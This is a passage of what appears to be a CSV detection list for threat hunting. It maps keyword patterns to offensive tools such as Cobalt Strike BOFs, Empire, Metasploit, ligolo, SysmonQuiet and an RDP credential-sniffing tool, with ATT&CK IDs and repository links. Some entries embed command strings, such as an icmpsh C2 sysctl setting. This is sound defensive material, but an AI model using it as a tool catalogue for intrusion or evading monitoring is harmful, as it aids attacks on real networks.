TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*synacktiv/ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*synacktiv_gpoddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*sync-starkiller*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*synergy_httpx.py*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" +"*Synergy-httpx-main*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" +"*syscall * out of bounds*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*syscall not permitted:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*syscall validate failed:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*syscall_disable_priv *","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" +"*syscall_enable_priv *","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" +"*syscall_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*syscalls.asm*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*syscalls.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*syscalls_dump.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_inject *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_inject.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_shinject *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_shspawn *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_spawn *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls_spawn.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscallsapcspawn.x64*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscalls-asm.h*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*syscallsdump.x64*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscallsinject.x64*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscallsspawn.x64*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*syscallStuff.asm*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*sysctl -w net.ipv4.icmp_echo_ignore_all=1*","greyware_tool_keyword","sysctl","Disable echo reply for icmpsh C2","T1040 - T1095 - T1090.001","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","0","N/A","4","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" +"*sysdream/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*Sysmon is being suffocated*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" +"*Sysmon is quiet now!*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" +"*sysmonquiet.*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" +"*SysmonQuiet-main*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" +"*SySS-Research*","offensive_tool_keyword","Github Username","github repo Open source IT security software tools and information and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SySS-Research","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SySS-Research/Seth*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*system rm -f /current/tmp/ftshell.latest*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" 